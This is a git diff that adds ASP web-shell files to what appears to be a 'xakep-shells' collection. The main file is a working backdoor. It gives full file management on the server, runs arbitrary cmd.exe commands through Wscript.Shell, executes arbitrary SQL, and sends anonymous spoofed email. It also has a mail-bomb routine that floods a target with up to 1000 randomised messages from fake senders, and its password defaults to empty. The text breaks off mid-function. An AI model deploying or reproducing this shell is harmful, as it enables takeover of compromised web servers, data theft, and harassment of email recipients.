+<!--T�M HAKLARI SAKLIDIR.. KODLARDA yapaca��nm�z bir de�i�iklik KODun �al��mamas�na mal olur. Bundan dolay� Bir sorun ��karsa EJDER & SaVSAK.CoM Sorunlu de�ildir..-->
+<!--Bu yaz�l�mda geli�tilmi� t�m her�ey , mant�k, algoritma, yaz�l�mlar S�f�rdan Ejder taraf�ndan yaz�lm��t�r. TEMA , d�zen vede G�r�n�m Fastboy a Aittir. -->
+<!-- TAKL�TLE�RNDEN KA�ININ. by EJDER-->
+
+<!--Ejder was HERE-->
+<%#@~^BgAAAA==vL[DMQIAAA==^#~@%><p align="right">&nbsp;</p>
+
diff --git a/xakep-shells/ASP/Elmali Seker.asp.txt b/xakep-shells/ASP/Elmali Seker.asp.txt
new file mode 100644
index 0000000..26765f8
--- /dev/null
+++ b/xakep-shells/ASP/Elmali Seker.asp.txt	
@@ -0,0 +1,2324 @@
+<%
+
+' Tac gia: forever5pi (theo huong dan cua anh vicki-vkdt)
+' Email : forever5pi@yahoo.com
+' Website: http://vnhacker.org
+
+option explicit
+
+Server.ScriptTimeout=10000
+Response.Buffer=false
+
+dim gURL,gMsg
+dim targetPath,cp_dst,mv_dst,root
+dim FSO,re
+dim zombie_array,special_array
+
+' ###################################### CONFIGURATION ######################################
+
+const gPassword="" ' mat khau ("" : khong dung password)
+
+const gMax=50 ' chieu dai toi da cho ten file
+const gBomb=1000 ' so luong mail mac dinh can bomb
+
+const lnkExt="lnk,url"
+const editExt="htm,html,asp,asa,txt,inc,css,aspx,js,vbs,shtm,shtml,xml,xsl,log,ini,bat,bak" ' danh sach cac file cho phep edit
+
+const TmpDir="C:\" ' thu muc tam thoi mac dinh
+const Shell="cmd.exe" ' shell mac dinh
+
+' cac chuoi ket noi mac dinh
+const cstrMSSQL = "Provider=SQLOLEDB;Data Source=SERVER_NAME;database=DB_NAME;uid=UID;pwd=PWD"
+const cstrJET = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=full_path/db_file.mdb" 
+const cstrACCESS = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=full_path/db_file.mdb"
+const cstrORACLE = "Provider=OraOLEDB.Oracle.1; Data Source=DB_NAME; User ID=UID; Password=PWD"
+const cstrMYSQL = "Driver=MySQL;server=SERVER_IP;uid=UID;pwd=PWD;database=DB_NAME"
+const cstrDSN = "DSN_NAME"
+
+const bSize=false' co/khong hien folder-size
+
+const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-" ' tap ki thu dung de sinh chuoi ngau nhien
+
+zombie_array=array("com","net","org","info","vn","cn") ' mang cac domain z0mbie
+special_array=array("yahoo.com","hotmail.com") ' mang cac domain dac biet (dung trong bomb mail)
+
+root=Server.MapPath(".") ' folder mac dinh
+
+' ###########################################################################################
+
+gURL=Request.ServerVariables("SCRIPT_NAME")
+Init()
+if (LCase(Left(Request.ServerVariables("HTTP_CONTENT_TYPE"),19))="multipart/form-data") and (Session("allow")=1) and (Session("mode")=0) then Upload()
+Secure()
+if Request.Form("command")="Logout" then Logout()
+if Request.Form("command")="ChangeMode" then
+Session("mode")=Request.Form("mode")
+Session("switch")=true
+end if
+select case Session("mode")
+case 0 myFile()
+case 1 myCMD()
+case 2 mySQL()
+case 3 myMail()
+end select
+
+'###########################################################################################
+
+sub myFile()
+if Session("switch")=true then
+targetPath=Session("targetPath")
+if targetPath="" then targetPath=root
+Session("switch")=false
+else
+targetPath=Trim(Request.Form("folder"))
+if targetPath="" then targetPath=root else targetPath=abspath(targetPath)
+
+select case Request.Form("command")
+case "Download"
+Download()
+exit sub
+case "Edit"
+Editor()
+exit sub
+case "ChangeAttributesFile","ChangeAttributesFolder"
+ChangeAttributesItem()
+exit sub
+case "Tree"
+Tree()
+exit sub
+case "Delete" Delete()
+case "Move" Move()
+case "Copy" Copy()
+case "ZipInfo" ZipInfo()
+case "NewFile","NewFolder" CreateItem()
+case "RenameFile","RenameFolder" RenameItem()
+case "OpenFolder" OpenFolder()
+case "LevelUp" targetPath=FSO.GetParentFolderName(abspath(Request.Form("folder")))
+case "LevelRoot" targetPath=findroot(abspath(Request.Form("folder")))
+end select
+
+Session("targetPath")=targetPath
+end if
+
+HtmlHeader("")
+HtmlMode()
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub myCMD()
+dim bDoIt
+dim bEcho
+dim szTmpDir,szShell,szCmd,szTmpFile
+dim oScript,oScriptNet,oFile
+
+HtmlHeader("")
+HtmlMode()
+
+set oScript=Server.CreateObject("Wscript.Shell")
+set oScriptNet=Server.CreateObject("Wscript.Network")
+
+szTmpDir=Trim(Request.Form("tmpdir"))
+szShell=Trim(Request.Form("shell"))
+szCmd=Trim(Request.Form("cmd"))
+bEcho=CBool(Request.Form("echo"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoit=false
+szTmpDir=Session("szTmpDir")
+szShell=Session("szShell")
+szCmd=Session("szCmd")
+bEcho=Session("bEcho")
+else
+bDoIt=true
+end if
+
+if szTmpDir="" then szTmpDir=TmpDir else szTmpDir=abspath(szTmpDir)
+if szShell="" then szShell=Shell
+
+Session("szTmpDir")=szTmpDir
+Session("szShell")=szShell
+Session("szCmd")=szCmd
+Session("bEcho")=bEcho
+
+%>
+<form name=frmCMD method=post action="<%=gURL%>">
+<table>
+<tr><td><b>T</b>mpDir:</td><td><input type=text name=tmpdir value="<%=Server.HtmlEncode(szTmpDir)%>" size=20></td></tr>
+<tr><td><b>S</b>hell:</td><td><input type=text name=shell value="<%=Server.HtmlEncode(szShell)%>" size=20></td></tr>
+<tr><td><b>C</b>md:</td><td><input type=text name=cmd value="<%=Server.HtmlEncode(szCmd)%>" size=80> <input type=submit value=Go></td></tr>
+<tr><td><b>E</b>cho:</td><td><input type=checkbox name=echo value=1<%if bEcho then Response.Write " checked"%>></td></tr>
+</table>
+</form>
+<script>frmCMD.cmd.focus()</script>
+<%
+if (szCmd<>"") and (bDoIt=true) then
+if bEcho then
+call oScript.Run(szShell & " /c " & szCmd)
+else
+szTmpFile = addslash(szTmpDir) & FSO.GetTempName
+call oScript.Run(szShell & " /c " & szCmd & " > " & szTmpFile, 0, true)
+if FSO.FileExists(szTmpFile) then set oFile=FSO.OpenTextFile (szTmpFile, 1, false, 0)
+end if
+end if
+%>
+<p><%=FormatDate(Now)%>
+<p><b>I</b>P: <%=Request.ServerVariables("LOCAL_ADDR")%><br>
+<b>U</b>ser: \\<%=oScriptNet.ComputerName%>\\<%=oScriptNet.UserName%>
+<%
+if (IsObject(oFile)) then
+on error resume next
+%>
+<pre>
+<%=Server.HtmlEncode(oFile.ReadAll)%>
+</pre>
+<%
+oFile.Close
+call FSO.DeleteFile(szTmpFile, true)
+end if
+
+set oScript=nothing
+set oScriptNet=nothing
+
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub mySQL()
+dim szConn,szSQL1,szSQL2,szSQL,bDoIt
+dim intChoice
+
+HtmlHeader("")
+HtmlMode()
+
+szConn=Trim(Request.Form("conn"))
+szSQL1=Trim(Request.Form("sql1"))
+szSQL2=Trim(Request.Form("sql2"))
+intChoice=CInt(Request.Form("choice"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+szConn=Session("szConn")
+szSQL1=Session("szSQL1")
+szSQL2=Session("szSQL2")
+intChoice=Session("intChoice")
+else
+bDoIt=true
+end if
+
+if intChoice=0 then intChoice=1
+if intChoice=1 then szSQL=szSQL1 else szSQL=szSQL2
+
+Session("szConn")=szConn
+Session("szSQL1")=szSQL1
+Session("szSQL2")=szSQL2
+Session("intChoice")=intChoice
+
+select case trim(ucase(szConn))
+case "MSSQL" 
+szConn=cstrMSSQL
+szSQL=""
+case "JET"
+szConn=cstrJET
+szSQL=""
+case "ACCESS"
+szConn=cstrACCESS
+szSQL=""
+case "ORACLE"
+szConn=cstrORACLE
+szSQL=""
+case "MYSQL"
+szConn=cstrMYSQL
+szSQL=""
+case "DSN"
+szConn=cstrDSN
+szSQL=""
+end select
+%>
+<input type=button value="<->" onclick="changeInput()">
+<form name=frmSQL method=post action="<%=gURL%>">
+<input type=hidden name=choice value="<%=intChoice%>">
+<b>C</b>onn: <input type=text name=conn value="<%=Server.HtmlEncode(szConn)%>" size=90> <br>
+<b>S</b>QL:  <span id=s1<%if intChoice=2 then Response.Write " style=""display:none"""%>><input type=text name=sql1 value="<%=Server.HtmlEncode(szSQL1)%>" size=90></span>
+<span id=s2<%if intChoice=1 then Response.Write " style=""display:none"""%>>( [F9] = Go )<br><textarea name=sql2 cols=42 rows=12 onkeydown="if (event.keyCode==120) frmSQL.submit();"><%=Server.HtmlEncode(szSQL2)%></textarea><br></span>
+<input type=submit value=Go>
+</table>
+</form>
+<script>
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+function changeInput() {
+if (s1.style.display=='none') {
+s1.style.display='inline';
+s2.style.display='none';
+frmSQL.choice.value="1";
+frmSQL.sql1.focus();
+} else {
+s1.style.display='none';
+s2.style.display='inline';
+frmSQL.choice.value="2";
+frmSQL.sql2.focus();
+}
+}
+</script>
+<%
+if (szConn<>"") and (szSQL<>"") and (bDoIt=true) then
+dim adoCon, rS
+dim i,intAffected
+
+set adoCon=Server.CreateObject("ADODB.Connection")
+adoCon.Open szConn
+set rS=adoCon.Execute(szSQL, intAffected)
+if (rS.Fields.Count>0) then
+' hien thi ten cua cac truong
+Response.Write "<table border=1>" & vbNewLine & "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt><b>"
+if (rS.Fields(i).Name="") then
+Response.Write "(No column name)"
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Name)
+end if
+Response.Write "</b></tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+' hien thi du lieu tren cac dong
+on error resume next
+rS.MoveFirst
+do while not rS.EOF
+Response.Write "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt>"
+if IsNull(rs.Fields(i).Value) then
+Response.Write "NULL"
+elseif (Trim(rs.Fields(i).Value)="") then
+Response.Write " "
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Value)
+end if
+Response.Write "</tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+rS.MoveNext
+loop
+rS.Close
+Response.Write "</table>" & vbNewLine
+end if
+
+Response.Write "<p><tt>(" & intAffected & " row(s) affected)</tt>"
+
+set rS=nothing
+set adoCon=nothing
+end if
+
+HtmlFooter()
+Destroy()
+end sub
+
+
+'###########################################################################################
+
+sub myMail()
+dim strFrom,strTo,strSubject,strBody,bHtml,intNumber,i,StartTime,EndTime,bDoIt
+dim objMail,objMsg
+
+strTo=Trim(Request.Form("to"))
+
+select case Request.Form("subcommand")
+case "Send"
+strFrom=Trim(Request.Form("from"))
+strSubject=Trim(Request.Form("subject"))
+strBody=Request.Form("body")
+bHtml=CBool(Request.Form("html"))
+case "Bomb"
+if IsNumeric(Request.Form("number")) then intNumber=Int(Request.Form("number"))
+strFrom=Session("strFrom")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+end select
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+strFrom=Session("strFrom")
+strTo=Session("strTo")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+intNumber=Session("intNumber")
+else
+bDoIt=true
+end if
+
+if (intNumber<=0) then intNumber=gBomb
+
+Session("strFrom")=strFrom
+Session("strTo")=strTo
+Session("strSubject")=strSubject
+Session("strBody")=strBody
+Session("bHtml")=bHtml
+Session("intNumber")=intNumber
+
+HtmlHeader("")
+HtmlMode()
+
+if bDoIt then
+select case Request.Form("subcommand")
+case "Send"
+if IsValidEmail(strTo) then
+set objMail=Server.CreateObject("CDONTS.NewMail")
+objMail.To=strTo
+objMail.From=strFrom
+objMail.Subject=strSubject
+objMail.Body=strBody
+if bHtml then
+objMail.BodyFormat=0 'HTML
+objMail.MailFormat=0 'MIME
+end if
+objMail.Send
+set objMail=nothing
+Response.Write "<b>M</b>essage was sent to " & strTo & " successfully." & vbNewLine
+end if
+case "Bomb"
+if IsValidEmail(strTo) then
+Response.Write "<b>B</b>ombing " & Replace(FormatNumber(intNumber,0),",",".") & " mail"
+if intNumber>1 then Response.Write "s"
+Response.Write " to " & strTo & " ... "
+StartTime=Timer
+set objMsg=Server.CreateObject("CDO.Message")
+objMsg.To=strTo
+Randomize
+for i=1 to intNumber
+objMsg.From=makeEmail()
+objMsg.Subject=makeText(Int((50-25+1)*Rnd+25))
+objMsg.TextBody=makeText(Int((100-50+1)*Rnd+50))
+objMsg.Send
+next
+set objMsg=nothing
+EndTime=Timer
+Response.Write howlong(EndTime-StartTime) & vbNewLine
+end if
+end select
+end if
+%>
+<p>
+<table border=1>
+<tr>
+<td width=50%>
+<form name=frmSend method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>a) <b>A</b>nonymous Mail</td>
+</tr>
+<tr>
+<td><b>F</b>rom:</td>
+<td><input type=text name=from value="<%=Server.HtmlEncode(strFrom)%>" size=25></td>
+</tr>
+<tr>
+<td><b>T</b>o:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>S</b>ubject:</td>
+<td><input type=text name=subject value="<%=Server.HtmlEncode(strSubject)%>" size=50></td>
+</tr>
+<tr>
+<td valign=top><b>B</b>ody:</td>
+<td><textarea name=body cols=37 rows=12><%=Server.HtmlEncode(strBody)%></textarea></td>
+</tr>
+<tr>
+<td><b>H</b>tml:</td>
+<td><input type=checkbox name=html value=1<%if bHtml=true then Response.Write " checked"%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Send></td>
+</tr>
+</table>
+</form>
+</td>
+<td width=50% valign=top>
+<form name=frmBomb method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>b) <b>B</b>omb Mail</td>
+</tr>
+<tr>
+<td><b>A</b>ddress:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>N</b>umber:</td>
+<td><input type=text name=number value=<%=intNumber%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Bomb></td>
+</tr>
+</table>
+</form>
+</td>
+</tr>
+</table>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+function IsValidEmail(strEAddress)
+dim objRegExpr
+set objRegExpr = New RegExp
+objRegExpr.Pattern = "^[a-zA-Z0-9][\w\.-]*[a-zA-Z0-9]@[\w-\.]*[a-zA-Z0-9]\.[a-zA-Z]{2,7}$"
+objRegExpr.Global = true
+objRegExpr.IgnoreCase = False
+IsValidEmail = objRegExpr.Test(strEAddress)
+set objRegExpr = nothing
+end function
+
+'###########################################################################################
+
+function makeEmail()
+Randomize
+if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "." & zombie_array(Int((UBound(zombie_array)-0+1)*Rnd+0)) else makeEmail=makeText(8) & "@" & special_array(Int((UBound(special_array)-0+1)*Rnd+0))
+end function
+
+'###########################################################################################
+
+function makeText(intLen)
+dim strNewText,i
+strNewText=""
+Randomize
+for i=1 to intLen
+strNewText=strNewText & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1)
+next
+makeText=strNewText
+end function
+
+'###########################################################################################
+
+function howlong(intTime)
+if (intTime<60) then
+howlong=intTime & " second(s)"
+elseif (intTime<60*60) then
+howlong=FormatNumber(intTime/60,2) & " minute(s)"
+else
+howlong=FormatNumber(intTime/(60*60),2) & " hour(s)"
+end if
+end function
+
+'###########################################################################################
+
+sub Tree()
+dim path
+path=abspath(Request.Form("param"))
+if FSO.FolderExists(path) then
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<%
+tree_dir(path)
+%>
+</body>
+</html>
+<%
+else
+%>
+<script>alert('Folder not found !');window.close();</script>
+<%
+end if
+Destroy()
+end sub
+
+sub tree_dir(path)
+dim strAttrib,strSize
+
+on error resume next
+
+dim oFolder
+dim oSubFolders,oSubFolder
+dim oFiles,oFile
+dim oSubFolders2,oSubFolder2
+dim oFiles2,oFile2
+
+set oFolder=FSO.GetFolder(path)
+set oSubFolders=oFolder.SubFolders
+set oFiles=oFolder.Files
+
+Response.Write "<p>" & FSO.GetAbsolutePathName(path)
+
+strAttrib=GetAttributes(oFolder.Attributes)
+
+if strAttrib<>" " then Response.Write " (" & GetAttributes(oFolder.Attributes) & ")"
+
+Response.Write vbNewLine
+
+if (oSubFolders.Count>0) or (oFiles.Count>0) then
+%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Type</font></td>
+<td align=center><font color=#FFFF00>Modified</font></td>
+<td align=center><font color=#FFFF00>Attributes</font></td>
+</tr>
+<%
+' liet ke thu muc
+for each oSubFolder in oSubFolders
+%>
+<tr bgcolor=#000000>
+<td><%=oSubFolder.Name%></td>
+<td align=right> </td>
+<td align=center>DIR</td>
+<td align=center><%=FormatDate(oSubFolder.DateLastModified)%></td>
+<td><%=GetAttributes(oSubFolder.Attributes)%></td>
+</tr>
+<%
+next
+
+' liet ke file
+for each oFile in oFiles
+%>
+<tr bgcolor=#000000>
+<td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetExtensionName(path & "\" & oFile.Name)="url") then Response.Write " title=""" & FindLink(path & "\" & oFile.Name) & """"%>><%=oFile.Name%></td>
+<td align=right><%=FormatSize(oFile.Size)%></td>
+<td align=center><%=oFile.Type%></td>
+<td align=center><%=FormatDate(oFile.DateLastModified)%></td>
+<td><%=GetAttributes(oFile.Attributes)%></td>
+</tr>
+<%
+next
+strSize=FormatSize(oFolder.Size)
+%>
+<tr bgcolor=#000000>
+<td colspan=5 align=center><%=oSubFolders.Count%> folder(s), <%=oFiles.Count%> file(s)<%if strSize<>"" then Response.Write " (" & strSize & ")"%></td>
+</tr>
+</table>
+<%
+' goi de qui
+for each oSubFolder in oSubFolders
+set oSubFolder2=oSubFolder.SubFolders
+set oFile2=oSubFolder.Files
+
+if (oSubFolder2.Count>0) or (oFile2.Count>0) then
+tree_dir(oSubFolder.ParentFolder & "\" & oSubFolder.Name)
+end if
+
+set oSubFolder2=nothing
+set oFile2=nothing
+next
+end if
+
+set oSubFolder=nothing
+set oFiles=nothing
+set oFolder=nothing
+end sub
+
+'###########################################################################################
+
+sub Editor()
+dim f,name,path
+
+on error resume next
+
+HtmlHeader("")
+
+name=Request.Form("param")
+path=addslash(targetPath) & name
+
+select case Request.Form("subcommand")
+case "Save","SaveAs"
+set f=FSO.OpenTextFile(path,2,true,-2)
+if Err.Number<>0 then
+gMsg="Can not write to the file """ & name & """, permission denied!"
+Err.Clear
+else
+f.Write Request.Form("content")
+end if
+set f=nothing
+set f=FSO.OpenTextFile(path,1,false,-2)
+case else
+if not FSO.FileExists(path) then
+gMsg="The file """ & name & """ does not exist"
+set f=FSO.CreateTextFile(path,false)
+if Err.Number<>0 then
+gMsg=gMsg & ", also unable to create new file."
+Err.Clear
+else
+gMsg=gMsg & ", created new file."
+end if
+else
+set f=FSO.OpenTextFile(path,1,false,-2)
+if Err.Number<>0 then
+gMsg="Can not read from the file """ & name & """, permission denied!"
+Err.Clear
+end if
+end if
+end select
+%>
+<% if gMsg<>"" then Response.Write "<script>alert('" & gMsg & "')</script>" & vbNewLine %>
+<p><b>E</b>diting - "<%=path%>"<br>
+<form name=frmFile method=post action="<%=gURL%>">
+<b>W</b>rap<input type=checkbox id=wrap onclick="EditorCommand('WordWrap')">
+<center>
+<table width=100%>
+<tr><td align=center>
+<textarea name=content rows=25 cols=46 style="width:580;height:330" wrap=off><%=Server.HTMLEncode(f.ReadAll)%></textarea>
+</td></tr>
+<tr><td align=center>
+<input type=button value=Save onclick="EditorCommand('Save')"> <input type=button value="Save As" onclick="EditorCommand('SaveAs')"> <input type=button value=Reload onclick="EditorCommand('Reload')"> <input type=button value=Close onclick="window.close()">
+</td></tr>
+</table>
+</center>
+<script>frmFile.content.focus()</script>
+<input type=hidden name=command value=Edit>
+<input type=hidden name=subcommand value="">
+<input type=hidden name=param value="<%=name%>">
+<input type=hidden name=folder value="<%=Request.Form("folder")%>">
+</form>
+<%
+set f=nothing
+HtmlJsEditor()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub ChangeAttributesItem()
+dim item,itemType,itemName,itemPath,itemAttrib
+
+itemType=Request.Form("command")
+itemName=Request.Form("param")
+itemPath=addslash(targetPath) & itemName
+
+HtmlHeader("")
+
+select case itemType
+case "ChangeAttributesFile" set item=FSO.GetFile(itemPath)
+case "ChangeAttributesFolder" set item=FSO.GetFolder(itemPath)
+end select
+
+if Request.Form("subcommand")="change" then
+itemAttrib=int(Request.Form("r"))
+itemAttrib=itemAttrib+int(Request.Form("h"))
+itemAttrib=itemAttrib+int(Request.Form("a"))
+itemAttrib=itemAttrib+int(Request.Form("s"))
+on error resume next
+item.Attributes=int(itemAttrib)
+if Err.Number<>0 then Response.Write "<script>alert('Permission denined')</script>" & vbNewLine
+end if
+
+itemAttrib=item.Attributes
+%>
+<b>C</b>hange attributes - "<%=itemName%>"
+<p align=center>
+<form name=frmAttrib method=post action="<%=gURL%>">
+<input type=hidden name=command value="<%=itemType%>">
+<input type=hidden name=subcommand value=change>
+<input type=hidden name=folder value="<%=targetPath%>">
+<input type=hidden name=param value="<%=itemName%>">
+<table>
+<tr>
+<td><input type=checkbox name=r value=1 <%if (itemAttrib and 1)>0 then Response.Write " checked"%>>Read-only</td>
+<td><input type=checkbox name=h value=2 <%if (itemAttrib and 2)>0 then Response.Write " checked"%>>Hidden</td>
+</tr>
+<tr>
+<td><input type=checkbox name=a value=32 <%if (itemAttrib and 32)>0 then Response.Write " checked"%>>Archive</td>
+<td><input type=checkbox name=s value=4 <%if (itemAttrib and 4)>0 then Response.Write " checked"%>>System</td>
+</tr>
+</table><br>
+<input type=button value=OK onclick="frmAttrib.submit()"> <input type=button value=Close onclick="window.close()">
+</form>
+</p>
+<%
+set itemType=nothing
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub OpenFolder()
+if Trim(Request.Form("folder"))="" then 
+if Trim(Request.Form("param"))="" then targetPath=root else targetPath=abspath(Trim(Request.Form("param")))
+else
+targetPath=addslash(Trim(Request.Form("folder"))) & Trim(Request.Form("param"))
+end if
+end sub
+
+'###########################################################################################
+
+sub CreateItem()
+dim itemType,itemName,itemPath 
+itemType=request.form("command")
+itemName=request.form("param")
+itemPath=addslash(targetPath) & itemName
+
+on error resume next
+
+select case itemType
+case "NewFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateFolder(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the folder """ & itemName & """, an error occured..."
+else
+gMsg="Created the folder """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the folder """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+case "NewFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateTextFile(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the file """ & itemName & """, an error occured..."
+else
+gMsg="Created the file """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the file """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+end select
+end sub
+
+'###########################################################################################
+
+sub ZipInfo()
+dim path,zip,zipfile,i
+
+path=addslash(targetPath) & Request.Form("param")
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<p><%=path%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Ratio</font></td>
+<td align=center><font color=#FFFF00>Packed</font></td>
+<td align=center><font color=#FFFF00>Modify</font></td>
+<td align=center><font color=#FFFF00>Path</font></td>
+</tr>
+<%
+set zip=new clszip
+zip.ZipLoad(path)
+set zipfile=new clsZipFile
+
+for i=1 to zip.FileCount
+set zipfile=zip.GetFile(i)
+with zipfile
+if not (.IsFolder Or .IsOverall) then
+Response.Write "<tr bgcolor=#000000>" & vbNewLine
+Response.Write " <td>" & .Name & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Size,0) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & .Ratio & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Packed,0) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(.Modified) & "</td>" & vbNewLine
+Response.Write " <td>" & .Path & "</td>" & vbNewLine
+end if
+end with
+next
+
+set ZipFile=nothing
+set zip=nothing
+%>
+</table>
+</p>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Delete()
+dim i,ndir,nfile,itemName,itemPath
+
+on error resume next
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>D</b>elete folder(s)..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFolder itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>D</b>elete file(s)..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFile itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Copy()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+cp_dst=Trim(Request.Form("cp"))
+if cp_dst="" then exit sub
+cp_dst=abspath(cp_dst)
+Session("cp_dst")=cp_dst
+
+if FSO.FolderExists(cp_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>C</b>opying folder(s) to """ & cp_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFolder itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>C</b>opying file(s) to """ & cp_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFile itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Move()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+mv_dst=Trim(Request.Form("mv"))
+if mv_dst="" then exit sub
+mv_dst=abspath(mv_dst)
+Session("mv_dst")=mv_dst
+
+if FSO.FolderExists(mv_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>M</b>oving folder(s) to """ & mv_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFolder itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+set item=nothing
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>M</b>oving file(s) to """ & mv_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFile itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+end sub
+
+'###########################################################################################
+
+sub RenameItem()
+dim item,itemType,itemName,itemPath
+dim param,newName
+
+itemType=request.form("command")
+param=split(request.form("param"),"|")
+itemName=param(0)
+newName=param(1)
+itemPath=addslash(targetPath) & newName
+
+on error resume next
+
+select case itemType
+case "RenameFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFolder(itemPath)
